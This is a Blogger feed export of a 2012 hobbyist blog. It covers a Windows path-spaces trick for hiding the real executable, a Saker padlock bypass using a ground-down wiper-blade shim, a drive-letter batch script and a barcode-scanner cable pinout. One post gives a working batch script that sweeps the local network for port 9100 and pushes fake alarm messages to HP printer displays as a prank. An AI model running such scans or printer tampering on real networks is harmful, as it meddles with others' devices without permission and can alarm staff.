C:\Progra~1\Crappy App\Whatever.exe<br />
This would execute C:\Program Files\Crappy.exe <br />
<br />
So there you have it, a different view. Using spaces to hide the true path of execution instead of using it to exploit a priv escalation.Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-7776905799486744720.post-61877805266662105212012-08-02T05:28:00.000-10:002012-08-06T04:34:28.778-10:00Saker Top Security Padlock Bypass<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgDkwTIzzYs95IS-P5ZmG3TWWxd4Ine8L_-1D7anfSgSlniht47lggJRqwqd6a64uOj6hbL9Qsh28sh80SRoFBABcTHGs5Xj5TcDfwVSYM4Q54ZR6iJ3njfc_EBJv1pNwidImzL4gLqLjU/s1600/The+lock.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="320" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgDkwTIzzYs95IS-P5ZmG3TWWxd4Ine8L_-1D7anfSgSlniht47lggJRqwqd6a64uOj6hbL9Qsh28sh80SRoFBABcTHGs5Xj5TcDfwVSYM4Q54ZR6iJ3njfc_EBJv1pNwidImzL4gLqLjU/s320/The+lock.jpg" width="208" /></a></div>
I've been struggling with this lock for quite some time now. I even took it to Defcon to the Lock Pick Village and had one of the Toool members take a crack at it and give me some advise on it. They couldn't open it either. They did give me some solid advise on attacking serrated and spool pins through a slow and meticulous approach.<br />
<br />
This is 1 of 2 locks left standing out of the batch I picked up from Ebay a while back. The Abus diskus is the other lock I have yet to defeat. I've been working on both of them for quite a while now, I think the Abus will fall soon.<br />
<br />
I'd taken the Saker apart in the past and noticed a bit of slop behind the cylinder between the release latch and the cylinder that I thought I might be able to use to make a bypass for this.<br />
<br />
I was right.<br />
<br />
I finally got around to it yesterday and made this:<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiQMzj72D9bpgPBFDVGBQfYgfEvSkvKuV8CtfJVx4K_tx2tXJzvCvAEL0qFCQW-Rmq3ZlRCc72B1MbAGyAvSOR1NpNykhgWQKjIbmCRzqnuqtHNqyGPKt1dpecAN7xUP3Sy8xGsrGAfI3w/s1600/Bypass+tool.jpg" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="171" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiQMzj72D9bpgPBFDVGBQfYgfEvSkvKuV8CtfJVx4K_tx2tXJzvCvAEL0qFCQW-Rmq3ZlRCc72B1MbAGyAvSOR1NpNykhgWQKjIbmCRzqnuqtHNqyGPKt1dpecAN7xUP3Sy8xGsrGAfI3w/s320/Bypass+tool.jpg" width="320" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Sorry rest of the world, I don't have a cm/mm ruler available at home.</td><td class="tr-caption" style="text-align: center;"></td><td class="tr-caption" style="text-align: center;"></td><td class="tr-caption" style="text-align: center;"><br /></td><td class="tr-caption" style="text-align: center;"><br /></td><td class="tr-caption" style="text-align: center;"><br /></td></tr>
</tbody></table>
It doesn't look like much and it will only last for about 5 openings tops I assume but it gets the job done.<br />
<br />
I used a piece of spring steel from windshield wiper blades and a Dremel to grind it down, then some 100, 220, 320 sandpaper.<br />
The narrow part is about 1/16 of an inch wide, small enough to turn in the keyway of the lock cylinder.<br />
<br />
Here's how everything fits together.<br />
<br />
You can remove the plate that keeps the lock cylinder in place by opening the lock and unscrewing this screw at the bottom of the shackle hole. <br />
<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgdb7Ocpg-8QZGe6WEEHyDdvb8jpl8l0meKozg5iWT-qKh6xzyRr484ykMFuE-gqJAOPGvepfiJaKHCMMLMfGPC2-0E6sFPpYMr1SFvTIeCqKzQwoXYUQJFLveaeEC3oJnKMpisSxZfANY/s1600/Screw.jpg" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgdb7Ocpg-8QZGe6WEEHyDdvb8jpl8l0meKozg5iWT-qKh6xzyRr484ykMFuE-gqJAOPGvepfiJaKHCMMLMfGPC2-0E6sFPpYMr1SFvTIeCqKzQwoXYUQJFLveaeEC3oJnKMpisSxZfANY/s1600/Screw.jpg" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Screw at the bottom of shackle hole</td></tr>
</tbody></table>
<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiry0uIEg2c-mDaI8yfQzbNRazYbrl7B53VXZlMYd3GG6Xi_qbt85sMI1o53-b2k_qeawV93pVYX5mfBeAQy6ciOzR-CtHydY2ri9O8LmdlRdHr1Vac3xvAZJxPuylGrtefVCmoRIOT7Uo/s1600/Bottom.jpg" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="320" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiry0uIEg2c-mDaI8yfQzbNRazYbrl7B53VXZlMYd3GG6Xi_qbt85sMI1o53-b2k_qeawV93pVYX5mfBeAQy6ciOzR-CtHydY2ri9O8LmdlRdHr1Vac3xvAZJxPuylGrtefVCmoRIOT7Uo/s320/Bottom.jpg" width="196" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Bottom of lock with plate to hold cylinder in.</td></tr>
</tbody></table>
<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEin1lFn6PcYHdAcLKfUXUL_BvE6wQ0d5jgsji41vb6CSN2bbecNc8cidwp2psAJDHBm3i7nR5iR7c5xxlmiSCbXhNQ8xMAxs5R9Czhxa6q9WKFk1cAmMGl-P8N-z0Gqt5YDkBatl61uly8/s1600/Internal1.jpg" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="320" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEin1lFn6PcYHdAcLKfUXUL_BvE6wQ0d5jgsji41vb6CSN2bbecNc8cidwp2psAJDHBm3i7nR5iR7c5xxlmiSCbXhNQ8xMAxs5R9Czhxa6q9WKFk1cAmMGl-P8N-z0Gqt5YDkBatl61uly8/s320/Internal1.jpg" width="235" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Plate removed</td></tr>
</tbody></table>
This is the cylinder, notice the protruding portion. When the pins are aligned properly at the sheer this turns which then kicks over a release latch (see below)<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgdpDgAOTmLZjXvf-Pew3G_ezEXNew6PRzrt112eZso7ESKsiaej6PfgV9qGVMYkp4s7roJ2c2LWgFyYGy8dh4k41EULTZuKO43iQhMftcozzwTcaOElbihM_vr-dImyARD8DOtSjGMAAU/s1600/Lock.jpg" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgdpDgAOTmLZjXvf-Pew3G_ezEXNew6PRzrt112eZso7ESKsiaej6PfgV9qGVMYkp4s7roJ2c2LWgFyYGy8dh4k41EULTZuKO43iQhMftcozzwTcaOElbihM_vr-dImyARD8DOtSjGMAAU/s1600/Lock.jpg" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">This part here turns...</td></tr>
</tbody></table>
<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjhBZ77grcCLFcbabbhoJMdf-4gXqgAWgh6PtbnpfYUzv-cqSqS7GA14LZxjrCAbCvcG39ySWaBRl1DYVoognh9ysCLLK6jbS9roTEtN_Np2xnY7tEcS9UyUKpLhCif5oZia1dait0AMS4/s1600/naked-closed.jpg" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="320" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjhBZ77grcCLFcbabbhoJMdf-4gXqgAWgh6PtbnpfYUzv-cqSqS7GA14LZxjrCAbCvcG39ySWaBRl1DYVoognh9ysCLLK6jbS9roTEtN_Np2xnY7tEcS9UyUKpLhCif5oZia1dait0AMS4/s320/naked-closed.jpg" width="312" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">This part here. This is in the closed position. The shackle is fully inserted in this picture</td></tr>
</tbody></table>
<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhCtAZvFJzLlKk010g1nuxeDlsj9CFtyMJnuQQeT_dE9fpSzElAEik7F2-vsh2fA3Eg6OTRL2GsZUDcFugSW4uf9N-gEsK4uzNFHefUCwWXkzTtOg-Y1VifUI4o7pEx_amWu0aWqC0gDzU/s1600/naked-open.jpg" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="272" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhCtAZvFJzLlKk010g1nuxeDlsj9CFtyMJnuQQeT_dE9fpSzElAEik7F2-vsh2fA3Eg6OTRL2GsZUDcFugSW4uf9N-gEsK4uzNFHefUCwWXkzTtOg-Y1VifUI4o7pEx_amWu0aWqC0gDzU/s320/naked-open.jpg" width="320" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">This is in the open position and releases the balls holding the shackle in place</td><td class="tr-caption" style="text-align: center;"><br /></td><td class="tr-caption" style="text-align: center;"><br /></td></tr>
</tbody></table>
<br />
The bypass tool can go all the way through the cylinder, fit in between the extended portion of the cylinder and the release latch.<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi91DoXNHFM3ALyOLfSAloY1nEgOA1bTZOv-0fvq6eAgcejgKdj1ZkYRai_qhDAaV8KJ4eHQiXE4m5vGl8f_8Ne2qn_Ti9lArzr1fx9S7JNNanWq13Vxch6FWSAHa8xJlNyO13ws5OmeIM/s1600/lock-w-bypass-2nd-view.jpg" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi91DoXNHFM3ALyOLfSAloY1nEgOA1bTZOv-0fvq6eAgcejgKdj1ZkYRai_qhDAaV8KJ4eHQiXE4m5vGl8f_8Ne2qn_Ti9lArzr1fx9S7JNNanWq13Vxch6FWSAHa8xJlNyO13ws5OmeIM/s1600/lock-w-bypass-2nd-view.jpg" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Inserted and turned to actuate the release.</td></tr>
</tbody></table>
<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj-H6xTjut32vXDoFmhXdZXk9tTeLwrWskvuINP-dA6OkCrrqLH3NplPssCL46vP8GIn8hlhFu0dDUd5AF2DY6QiN0ICcvulVOe1BZl4aSz9PXHL00wY3uMAnQVzWCXci_Vc9xJRkMyDAU/s1600/body-w-bypass.jpg" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="320" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj-H6xTjut32vXDoFmhXdZXk9tTeLwrWskvuINP-dA6OkCrrqLH3NplPssCL46vP8GIn8hlhFu0dDUd5AF2DY6QiN0ICcvulVOe1BZl4aSz9PXHL00wY3uMAnQVzWCXci_Vc9xJRkMyDAU/s320/body-w-bypass.jpg" width="259" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Just enough room.</td></tr>
</tbody></table>
<br />
Here's some pictures of the cylinder and the bypass tool.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhU9VknleGqT87k2GT-HKGwo3D3Fiv4ljTO51RqfaCyH8oYCAYrygV4JD8xw9VYdvb3yjU4DMkk4cyJGT-GabH7LY4ZrbSCCiRDaLOCgDVOGAbwW2o7vA6Rw-U1kBbYNHW4m7sW4n2O3nA/s1600/lock-w-bypass-external.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="320" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhU9VknleGqT87k2GT-HKGwo3D3Fiv4ljTO51RqfaCyH8oYCAYrygV4JD8xw9VYdvb3yjU4DMkk4cyJGT-GabH7LY4ZrbSCCiRDaLOCgDVOGAbwW2o7vA6Rw-U1kBbYNHW4m7sW4n2O3nA/s320/lock-w-bypass-external.jpg" width="191" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh5PgKFwbpzu0bHeXfbwy5tDm9mtIHX5hyOefvM61r1I6RGP293rcaL3l9FLhJf1JOxSZ0dKgzfHwfZ5tOSphKM5_jDw9Lz52lRnMLuyCbN0gQz4b4WkCY1LBV-2y-kBbdB7XublKthbeI/s1600/lock-w-bypass-turned.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="320" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh5PgKFwbpzu0bHeXfbwy5tDm9mtIHX5hyOefvM61r1I6RGP293rcaL3l9FLhJf1JOxSZ0dKgzfHwfZ5tOSphKM5_jDw9Lz52lRnMLuyCbN0gQz4b4WkCY1LBV-2y-kBbdB7XublKthbeI/s320/lock-w-bypass-turned.jpg" width="212" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjhyphenhyphen_KQg5-fsGSbIR-bhwcighoD9vrWJYyn3E0efdhTkCLgzHtnwURuclBJXueqSdvv_egwRd5tlNzEDI3lYMj9kuPPpwZktdrX2XjH3hnUV1lr1aAUWmpuIzv2eCDAEIIVo9b3e_A9Hnk/s1600/lock-w-bypass.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="320" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjhyphenhyphen_KQg5-fsGSbIR-bhwcighoD9vrWJYyn3E0efdhTkCLgzHtnwURuclBJXueqSdvv_egwRd5tlNzEDI3lYMj9kuPPpwZktdrX2XjH3hnUV1lr1aAUWmpuIzv2eCDAEIIVo9b3e_A9Hnk/s320/lock-w-bypass.jpg" width="122" /></a></div>
<br />
<br />
And here's the finished result. Insert bypass, twist with a pair of pliers, and viola...<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgLOwQx3C3G1ny0ebRBSgdYqFQcSMgsZj4_Q3Uo-WfbeMBOr7fK1L6ST2i8ta4IFVs7IonipX1JJOxtHZbi6jT7_WLeAg-NRlgMFbBXUfwyOWU51d2XFoT2UHzyW9MQ7UM2Ca20MVe5pi8/s1600/Opened.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="259" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgLOwQx3C3G1ny0ebRBSgdYqFQcSMgsZj4_Q3Uo-WfbeMBOr7fK1L6ST2i8ta4IFVs7IonipX1JJOxtHZbi6jT7_WLeAg-NRlgMFbBXUfwyOWU51d2XFoT2UHzyW9MQ7UM2Ca20MVe5pi8/s320/Opened.jpg" width="320" /></a></div>
<br />
<br />
Now, I've been told that this is a knockoff of an American brand lock (5000 perhaps?). Which I'm sure is probably true, I haven't had the opportunity to see one and I have no idea if this same bypass would work on it.<br />
<br />
I still won't be satisfied until I can open it with real picks, but it's always nice to have an ace in your pocket.Unknownnoreply@blogger.com2tag:blogger.com,1999:blog-7776905799486744720.post-91701686918412393712012-07-10T04:52:00.001-10:002012-07-10T04:52:11.115-10:00Assign Drive Letters by Volume Name in BatchI ran across a problem with my backup software and USB drives a while back. Namely, when I changed out the drives they would sometimes randomly change the drive letter, since the backup was looking for a specific path E:\ or whatever it would fail. Failed backups are of no use to me. I don't want to take the time to go plug in the backup drives, then log into the server and check to make sure they have the proper drive letter assigned. It's a repetitive task the does not offer me any gained value.<br />
<br />
The biggest hassle of this is that I use diskpart. Microsoft has seen fit to have diskpart not display the same output two times in a row when running diskpart and not keeping it open. So if you run diskpart and output volumes list, then close it and run it again you're going to get two different outputs, same data, different order. Long story short you have to keep diskpart running somewhere in the background to get the output of commands to be the same.<br />
<br />
-=Script=-<br />
<br />
@echo off<br />
Set mm=%date:~4,2%<br />Set dd=%date:~7,2%<br />Set yyyy=%date:~10,4%<br />Set h=%time:~0,2%<br />if "%h:~0,1%"==" " set h=0%time:~1,1%<br />set m=%time:~3,2%<br />
start /min diskpart.exe<br />diskpart /s script.txt > output.txt<br />
for /f "tokens=3,4 delims= " %%a in (output.txt) do if /i %%b==VOLUMENAME if /i %%a==G goto end1<br />
for /f "tokens=3,4 delims= " %%a in (output.txt) do if /i %%b==VOLUMENAME if /i not %%a==G goto AssignG<br />:AssignG<br />echo Assigning G<br />for /f "tokens=1,2 delims= " %%a in ('type output.txt ^| find /i "VOLUMENAME"') do echo select %%a %%b > assigng.txt<br />echo assign letter = G >> assigng.txt<br />diskpart /s assigng.txt<br />del /f/ q assigng.txt<br />echo %mm%/%dd%/%yyyy% %h%:%m% >> logs.txt<br />echo Drive letter was changed and should be assigned properly >> logs.txt<br />taskkill /f /im diskpart.exe<br />del /f /q output.txt<br />exit<br />:end1<br />echo %mm%/%dd%/%yyyy% %h%:%m% >> logs.txt<br />echo drive letter assigned properly >> logs.txt<br />taskkill /f /im diskpart.exe<br />del /f /q output.txt<br />exit<br />
<br />
<br />
The beginning part is just some log keeping I like to do, sets variables with the date and time.<br />
<br />
Then we start our background diskpart, this allows us to get consistent output from diskpart. The diskpart script (diskpart /s script.txt) is simply "list volume", basically dumping a list of all volumes currently on the system.<br />
<br />
Next we do some checks to see if VOLUMENAME (replace with the name of the volume you're looking for) matches the letter it needs to be (in this case G).<br />
If everything is proper and VOLUMENAME is assigned the drive letter G then it writes the output to the log file and exits.<br />
If something has gone awry and VOLUMENAME is not assigned to G then it set off to change it in the :AssignG<br />
<br />
AssignG sets to writing out a diskpart script to change the drive letter to G. It then starts diskpart /s assigng.txt to do the actual work, then does a bit of logging to tell me that it had to change it.<br />
Then it kills the background diskpart task, as we can't have these things running about wild.<br />
<br />
That's is. It's handy. One less thing I have to do everyday. Less repetitive tasks are better, that leaves more time for mayhem.Unknownnoreply@blogger.com2tag:blogger.com,1999:blog-7776905799486744720.post-27891885816608533782012-06-27T09:13:00.000-10:002012-06-27T09:13:55.218-10:00DIY Replace the USB cable for WASP WLS9500I'd like to take a moment and call WASP out on their complete bullshit overpriced USB cables for their barcode scanners. Specifically the WLS9500:<br />
<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjgTJhn00xwqv1XkCHPT3B6UmxZAkmABpXF9JU46NFeY9Cb4PsA3OtNRBHeVJUJkkstY3FsEdnz9wvul3UOKhyRZhfigl50wKxwANLh-aMsQtHw9WxCoZOA-uy0Jz3y_PB3JV3BVvb-i40/s1600/Scanner.jpg" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="296" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjgTJhn00xwqv1XkCHPT3B6UmxZAkmABpXF9JU46NFeY9Cb4PsA3OtNRBHeVJUJkkstY3FsEdnz9wvul3UOKhyRZhfigl50wKxwANLh-aMsQtHw9WxCoZOA-uy0Jz3y_PB3JV3BVvb-i40/s320/Scanner.jpg" width="320" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Overly Complicated for Profit</td></tr>
</tbody></table>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgXN6CYhlwK6_JC6LUXe8XxJG6HND9JQHY3-niRFmmYB6L6e45BKCRKXm5g5fXOy4F1e5U1jfr9RJk920LOmPvec6d5h9fKrMZcR99icfPYYE95k_MPz_BYRGHw4B9ExGzchaR-5Tda21A/s1600/Model.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgXN6CYhlwK6_JC6LUXe8XxJG6HND9JQHY3-niRFmmYB6L6e45BKCRKXm5g5fXOy4F1e5U1jfr9RJk920LOmPvec6d5h9fKrMZcR99icfPYYE95k_MPz_BYRGHw4B9ExGzchaR-5Tda21A/s1600/Model.jpg" /></a></div>
<br />
First off the cables have about a 80% failure rate within 3-4 months, from my experience.<br />
<br />
Second the price they want for a replacement cable is ridiculous, on average around the web about $55 USD.<br />
<br />
They use a RJ-50 aka the RJ-45 10 pin adapter for the connection to the scanner. Why an RJ-50? They must be using those 10 pins for something really cool right? Surely they wouldn't do this just to charge more to their customers and make it difficult to fix yourself...<br />
<br />
When you take the plug end out of the scanner to look at the pin out you see this:<br />
<br />
1- Black<br />
2- Red<br />
3- Black<br />
4- White<br />
5- White<br />
6- Black<br />
7- Green<br />
9- White<br />
10-White<br />
<br />
When you get down to it and manage to get the actual plug end uncovered from the "protective" sleeve that they've glued and molded onto the plug, which is no small task might I add, you see that most of it is just blank pieces of plastic taking up space.<br />
<br />
Pins 4,8,9, and 10 are complete bullshit, just pieces of plastic, there's not even copper wire in them, 100% plastic. Useless, unneeded, plastic that serves no purpose.<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgo_d5qq7-17DzPUllvayBN_UMEwiQgNGDfFOdPuG7aS39Eb7TIhF0C0EH88jOxcjJN7cRe7OjVfWBwlmFux68MLqJTLRTaP4mfbnDtlKeTY-uqMAxvGVP1mE6SfEv3cW5iJTMWwOBmvIg/s1600/Whitejunk.jpg" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="320" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgo_d5qq7-17DzPUllvayBN_UMEwiQgNGDfFOdPuG7aS39Eb7TIhF0C0EH88jOxcjJN7cRe7OjVfWBwlmFux68MLqJTLRTaP4mfbnDtlKeTY-uqMAxvGVP1mE6SfEv3cW5iJTMWwOBmvIg/s320/Whitejunk.jpg" width="276" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">White Lies</td><td class="tr-caption" style="text-align: center;"><br /></td></tr>
</tbody></table>
<br />
Pins 1 and 6 are looped together with one piece of wire in a U shape. And wouldn't you know, it doesn't work properly without 1 and 6 looped, what an amazing coincidence that you COULD make this thing with just a standard RJ45, or a RJ11 and make it easily serviceable, replaceable, and able to be done in house.<br />
<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi3-sR3-0iGukTDHNF3GVdYEvpWNEho6OJ-TQolKccje5cggAj60OgyWpqDDWTfL-dnnU6GzJHhf64s2m1s91WMuE6XOfjMCSd3KSJuHsQai1nsgKXbn_iaA3j1j269NifGJfM-fe-OFYM/s1600/magic.jpg" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="320" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi3-sR3-0iGukTDHNF3GVdYEvpWNEho6OJ-TQolKccje5cggAj60OgyWpqDDWTfL-dnnU6GzJHhf64s2m1s91WMuE6XOfjMCSd3KSJuHsQai1nsgKXbn_iaA3j1j269NifGJfM-fe-OFYM/s320/magic.jpg" width="189" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">The "Magic" Wire</td></tr>
</tbody></table>
So after you eliminate those 6 pins you're left with your regular 4 USB wires in slots 2,3,5,7.<br />
<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjFwR1zc2-7waY1ayFpU9b_Q3nN6FTWw6cypaSWU5t3BXB7-Ro16FVe9wCYKF8BJtpCyxrDULJA1YeaTuTL97NY43VMYaJExG-vTYbQ5XDtx5QIIy5n-75Ve002hOIEXc37qZBhyfxiJ6E/s1600/USB.jpg" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="320" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjFwR1zc2-7waY1ayFpU9b_Q3nN6FTWw6cypaSWU5t3BXB7-Ro16FVe9wCYKF8BJtpCyxrDULJA1YeaTuTL97NY43VMYaJExG-vTYbQ5XDtx5QIIy5n-75Ve002hOIEXc37qZBhyfxiJ6E/s320/USB.jpg" width="255" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Awesome Splice Job</td></tr>
</tbody></table>
<br />
<br />
Actual pinout<br />
1- Black - Looped to 6<br />
2- Red - USB<br />
3- Black - USB<br />
4- Useless<br />
5- White - USB<br />
6- Black - Looped to 1<br />
7- Green - USB<br />
8- Useless<br />
9- Useless<br />
10- Useless<br />
<br />
Ordered the equipment online, crimper ~$40, ends .99 / each. If you have a small fleet of these things to take care of, like I do, I suggest you make the investment also and tell WASP to get bent.Unknownnoreply@blogger.com1tag:blogger.com,1999:blog-7776905799486744720.post-39640375446503080202012-06-22T05:43:00.000-10:002012-06-22T05:43:17.750-10:00Fun with HP PrintersThere are few things in life that are as entertaining as the confusion and chaos that ensue when you make minor changes to the environment/daily routine of people that do office work.<br />
<br />
Something as simple as changing the display on a network printer will immediately cause 1 of two reactions, total and complete mental shutdown or complete denial of acceptance into their reality aka they ignore it.<br />
<br />
Once upon a time one of the l0pht team made a small utility called the HP Display Hack, sili circa 12/8/97 according to the useage output. This allows you to change the standard message on HP printer displays. There are several other utilities you can do this with, such as HiJetter by Phenoelit. Also you can just telnet/putty in on 9100 and issue @PJL RDYMSG DISPLAY="BlahBlah". <br />
<br />
So anyways, I wrote a script to find you local network, scan 1-254 and find anything that responds to ping, then check if it will establish a telnet connection on port 9100, if so use the HP Display Hack program to randomly change the message to 1 of the 10 options (change if you like, up to 16 characters).<br />
<br />
Not particularly evil, but always good for a laugh, especially when the help desk gets a call about the printer in the accounting office stating it's uploading documents to the CIA. Or the internal printer fire in the warehouse.<br />
<br />
-=Script=-<br />
<br />
@echo off<br />setlocal enabledelayedexpansion<br />::find network<br />for /f "tokens=2 delims=:" %%i in ('ipconfig ^| find /i "Ip Address"') do set network=%%i<br />for /f "tokens=1,2,3 delims=." %%i in ("%network%") do set network2=%%i.%%j.%%k<br />::Scan for Active Hosts<br />for /L %%i in (1,1,254) do ping -n 1 -w 60 %network2%.%%i | find /i "reply" >> ~temp1<br />for /f "tokens=3 delims=: " %%i in (~temp1) do echo %%i >> ~temp2<br />del /f /q ~temp1 > nul<br />::Check for port 9100 (aka printers)<br />for /f %%i in (~temp2) do (<br /> set t=!random!<br /> set r=!t:~1,1!<br /> if !r! == 1 set message="[READY] TO ROCK"<br /> if !r! == 2 set message="Uploading to CIA"<br /> if !r! == 3 set message="FEED ME A KITTEN"<br /> if !r! == 4 set message="Spelling Error"<br /> if !r! == 5 set message="Internal Fire"<br /> if !r! == 6 set message="OUT OF LETTERS"<br /> if !r! == 7 set message="Self Destruct:ON"<br /> if !r! == 8 set message="PCLOAD LETTER"<br /> if !r! == 9 set message="POWER FLUID LOW"<br /> if !r! == 0 set message="Insert Coin"<br /> set r=<br /> set t=<br /> start /min telnet %%i 9100<br /> ping -n 5 127.0.0.1 > nul<br /> netstat -n | find /i "%%i:9100" | find /i "Established" && hpnt.exe %%i "!message!" <br /> taskkill /f /IM telnet.exe<br />)<br />del /f /q ~temp2 > nul<br />exit<br />
<br />
<br />
As stated previously hpnt just issues the @PJL RDYMSG Display="whatever" command over telnet. It could be done with a piped text file to netcat also as there's no way I know of to send commands to a telnet session in pure batch.<br />
<br />
<code></code>Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-7776905799486744720.post-44957552031948838132012-06-21T06:10:00.002-10:002012-06-26T05:28:45.026-10:00Master Lock Warded Padlock Teardown<br />
<div class="separator" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em; text-align: center;">
